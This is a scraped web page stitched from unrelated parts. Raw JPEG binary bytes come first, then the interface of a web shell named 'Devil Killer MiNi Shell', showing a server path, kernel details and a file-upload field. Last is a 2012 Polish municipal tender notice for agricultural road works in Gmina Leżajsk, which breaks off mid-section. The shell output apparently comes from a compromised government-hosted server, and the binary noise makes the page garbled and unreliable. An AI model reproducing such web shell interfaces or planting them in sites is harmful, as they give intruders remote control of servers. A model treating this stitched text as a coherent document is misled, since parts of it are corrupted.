JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120724/160851-N-2012.html

<p class="kh_header"><b>Leżajsk: MODERNIZACJA DRÓG DOJAZDOWYCH DO GRUNTÓW ROLNYCH NA OBIEKTACH POSCALENIOWYCH NA TERENIE GMINY LEŻAJSK</b><br>
<b>Numer ogłoszenia: 160851 - 2012; data zamieszczenia: 24.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leżajsk , ul. Opalińskiego 2, 37-300 Leżajsk, woj. podkarpackie, tel. 017 240 62 00, faks 017 240 62 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lezajsk.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA DRÓG DOJAZDOWYCH DO GRUNTÓW ROLNYCH NA OBIEKTACH POSCALENIOWYCH NA TERENIE GMINY LEŻAJSK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Inwestycja podzielona została na trzy oddzielne części:

Część nr 1
Modernizacja drogi dojazdowej do gruntów rolnych na obiekcie poscaleniowym, w obrębie Brzóza Królewska  dz. o nr ewid. 1724, 1681.  
Część nr 2
Modernizacja drogi dojazdowej do gruntów rolnych na obiekcie poscaleniowym, w obrębie Brzóza Królewska  dz. o nr ewid. 3712.
Część nr 3
Modernizacja drogi dojazdowej do gruntów rolnych na obiekcie poscaleniowym, w obrębie Giedlarowa dz. o nr ewid. 3428, 3440, 3573.

1)  Specyfikacja techniczna wykonania i odbioru robót - (wg załącznika nr 6 do siwz)
2)  Przedmiar robót - (wg załącznika nr 7 do siwz)

Inwestycja obejmuje swym zasięgiem teren wsi Brzóza Królewska w Gminie Leżajsk na    
działkach o numerach ewidencyjnych 1724, 1681, długość odcinka planowanego do
modernizacji 750 m szerokość pasa jezdni 4 m poprzez wykonanie:

-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,750 km
-  koryta wykonane na długości 510 m pasem szerokości jezdni 4 m ( 2040 m2)
-  profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni  na długości 240 m pasem szerokości 4 m ( 960 m2)
-  wzmocnienie istniejącej nawierzchni na długości 240 m pasem szerokości 4m (960 m2)tłuczniem  kamiennym twardym warstwa 7 cm po zagęszczeniu    
-  wykonanie nawierzchni z tłucznia kamiennego , warstwa dolna po uwałowaniu 10 cm na długości 510 m pasem szerokości 4 m (2040 m2)
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na  długości 510 m pasem szerokości 4 m (2040 m2)
-  ręczne ścinanie i karczowanie  krzaki i poszycia rzadkie  pas rowu   0,06 ha
-  odmulenie rowu na odcinku 600 m , warstwa namułu 40 cm szerokość dna 40 cm.
-  wywóz urobku samochodami samowyładowczymi do 1km 120 m3
-  ścieki z elementów betonowych na podsypce cementowo piaskowej  115 m
-  umocnienie skarp rowu płytami betonowymi 50x 50 x 7 cm    80 m2
-  rozebranie przepustów rurowych betonowych O 30 dł. 6 m  szt. 3 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 0,36 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O40  6 m  szt.1

- rozebranie przepustów rurowych betonowych O 40 dł. 30 m  szt. 5 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 2,4 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O40  30 m  szt.5

- rozebranie przepustów rurowych betonowych O 50 dł. 6 m  szt. 1 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 0,6 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O50  6 m  szt.1
- wykonanie ścianek czołowych do przepustu O50  szt.2.

Inwestycja obejmuje swym zasięgiem teren wsi Brzóza Królewska w Gminie Leżajsk na    
działce o numerze ewidencyjnych 3712, długość odcinka planowanego do
modernizacji 735 m szerokość pasa jezdni 4 m poprzez wykonanie:

-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,435 km
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na długości 435 m pasem szerokości 4 m (1740 m2)
-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,300 km
-  profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni  na długości 300 m pasem szerokości 4 m ( 1200 m2)   
-  wykonanie nawierzchni z tłucznia kamiennego , warstwa dolna po uwałowaniu 10 cm na długości 300 m pasem szerokości 4 m (1200 m2)
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na długości 300 m pasem szerokości 4 m (1200 m2)
-  ręczne ścinanie i karczowanie  krzaki i poszycia rzadkie  pas rowu   0,025 ha
-  odmulenie rowu obustronnie 1320 m , warstwa namułu 30 cm szerokość dna 40 cm.
-  wywóz urobku samochodami samowyładowczymi do 1km 437 m3
-  ścinanie poboczy mechanicznie gr do 10 cm  1470 m2
-  ścieki z elementów betonowych na podsypce cementowo piaskowej  20 m
- umocnienie skarp rowu płytami betonowymi 50x 50 x 7 cm    20 m2
- rozebranie przepustów rurowych betonowych O 40 dł. 30 m  szt. 5 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 2,4 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O40  30 m  szt.5
- rozebranie przepustów rurowych betonowych O 60 dł. 10 m  szt. 1 .
- wykonanie ławy fundamentowej pod przepusty rurowe pod zjazdami 1,2 m3
- wykonanie przepustu rurowego pod zjazdami rury betonowe O60  10 m  szt.1
- wykonanie ścianek czołowych do przepustu O60  szt.2.

Inwestycja obejmuje swym zasięgiem teren wsi Giedlarowa  w Gminie Leżajsk na     działkach o numerach ewidencyjnych 3428, 3440,3573, długość odcinka planowanego do
modernizacji 535 m szerokość pasa jezdni 4 m poprzez wykonanie:

-  roboty  pomiarowe z wytyczeniem trasy drogi; 0,535 km
-  koryta wykonane na długości 535 m pasem szerokości jezdni 4 m ( 2140 m2)
-  ścieki z elementów betonowych na podsypce cementowo piaskowej  3 m  
-  wykonanie nawierzchni z tłucznia kamiennego , warstwa dolna po uwałowaniu 10 cm na długości 535 m pasem szerokości 4 m (2140 m2)
-   wykonanie nawierzchni z tłucznia kamiennego , warstwa górna po uwałowaniu 7 cm na  długości 535 m pasem szerokości 4 m (2140 m2)

Wykonawca podczas odbioru przedstawia Zamawiającemu komplet dokumentacji niezbędnej do odbioru, który powinien zawierać w szczególności: kosztorys powykonawczy, atesty wbudowanych materiałów, deklaracja zgodności, inwentaryzacje powykonawcze.

Materiały budowlane stosowane do wykonywania przedmiotu zamówienia muszą spełniać wymogi art. 10 ustawy Prawo Budowlane.

Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego materiały spełniają wymagania określone przez Zamawiającego.
(wg załącznika nr 7 do siwz).

Każda pozycja w kosztorysie ofertowym powinna być odrębnie wyceniona.

Kosztorys ofertowy uproszczony  musi być w pełni zgodny z zapisami zawartymi w przedmiarze robót (materiał, opis, ilość) i  ma zawierać ceny jednostkowe dla poszczególnych pozycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje realizacje zamówień uzupełniających, o których mowa      w art. 67 ust. 1 pkt 6 uPzp stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości :

Część numer 1-    3 000,00 PLN (słownie: trzy tysiące  złotych).
Część numer 2-    3 000,00 PLN (słownie: trzy tysiące złotych).
Część numer 3-    2 000, 00 PLN (słownie:  dwa tysiące złotych).


W sytuacji gdy Wykonawca ubiega się o udzielenie zamówienia na więcej niż jedno z wyżej wymienionych części, wadia na poszczególne zadania podlegają sumowaniu. 

Wadium należy wnieść w jednej lub kilku następujących formach przewidzianych w art. 45 ust. 6 uPzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 z późn. zm.).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium w pieniądzu należy przelać na konto Zamawiającego:

Bank Pekao SA I O. w Leżajsku nr 45 1240 2630 1111 0000 3637 1846

W przypadku wadium wnoszonego w pieniądzu za termin wpłynięcia wadium uznaje się termin jego wniesienia. Przez wniesienie rozumie się uznanie kwoty wadium przez rachunek Zamawiającego. Do oferty należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek Zamawiającego. Wadium wnoszone w pieniądzu powinno znajdować się fizycznie na koncie Zamawiającego przed terminem składania ofert pod rygorem określonym w art. 24 ust. 2 pkt 2 uPzp.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu należy złożyć w osobnej kopercie opisanej Wadium- modernizacja dróg dojazdowych do gruntów rolnych na obiektach poscaleniowych na terenie Gminy Leżajsk- Część numer oraz włożyć do koperty zewnętrznej.
Wadium wniesione w formie innej niż pieniężna musi spełniać następujące wymagania:
­	odpowiadać co do wartości wysokości wadium określonej w niniejszej SIWZ,
­	musi odpowiadać co do terminu ważności terminowi związania ofertą określonemu w niniejszej SIWZ,
­	zawierać w swej treści okoliczności (zgodnie z art. 46 ust. 4a i 5 uPzp) w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu, wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie zamawiającego bez protestu gwaranta (poręczyciela),
Zamawiający zwróci niezwłocznie wadium na zasadach określonych w art. 46 uPzp.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe                  
z przyczyn leżących po stronie Wykonawcy. 
-	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPzp, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 uPzp lub pełnomocnictw, chyba że udowodni, że nie wynika to z przyczyn nie leżących po jego stronie.
Wykonawca lub podmiot wystawiający gwarancję bankową/ubezpieczeniową nie może uzależnić dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności (np.: przesłania wezwania za pośrednictwem banku prowadzącego rachunek ), jak również od przedłożenia dodatkowej dokumentacji, dodatkowych oświadczeń złożonych przez wykonawcę lub inny podmiot pod rygorem wykluczenia Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w kwocie co najmniej:
       Część numer 1-  100 000, 00 PLN (słownie: sto tysięcy złotych).
       Część numer 2-  100 000,00 PLN (słownie: sto tysięcy złotych).
       Część numer 3-   70 000,00 PLN (słownie: siedemdziesiąt tysięcy  złotych).   
Zamawiający badając ten warunek będzie się kierował regułą: spełnia albo nie spełnia, analizując treść złożonej oferty, uwzględniając w szczególności m.in. zgodność załączonych do oferty dokumentów z wymogami przedstawionymi w specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz oferty; 2) oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust. 1 uPzp; 3) kosztorys ofertowy uproszczony na wybrane części; 4) informacja o podwykonawcach( jeżeli dotyczy); 5) pełnomocnictwo do reprezentowania wykonawców w postępowaniu lub reprezentowaniu ich i zawarcia umowy (jeżeli dotyczy);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na zasadach określonych we wzorze umowy, będącym załącznikiem do specyfikacji istotnych warunków zamówienia (wg załącznika nr 5 do siwz)
Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba że wystąpią istotne okoliczności których nie można było wcześniej przewidzieć, a które przemawiają za koniecznością zmiany postanowień umowy. 
Mogą być to:
-  działanie siły wyższej,
Warunkiem wprowadzenia istotnych zmian w umowie jest wniosek o zmianę umowy (zawarcie aneksu) złożony przez Wykonawcę.
Wykonawca zobowiązany jest wykazać zaistnienie ww okoliczności poprzez przedłożenie stosownych ekspertyz, opinii, itp.
Wszelkie istotne zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej pod rygorem nieważności.
Wprowadzenie zmian nieistotnych w umowie wymagają formy pisemnej pod rygorem nieważności ( np.: zmiana kierownika budowy).
Podpisanie aneksu do umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego uzasadnienie.
Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu zakończenia realizacji zadania, zmiana terminu płatności, wydłużenie terminów obowiązywania gwarancji złożonych  tytułem zabezpieczenia należytego wykonania umowy.
W sytuacji zmiany wysokości stawki podatku od towarów i usług nie wpłynie to na zwiększenie kwoty określonej w umowie. Cena brutto określona w formularzu ofertowym pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
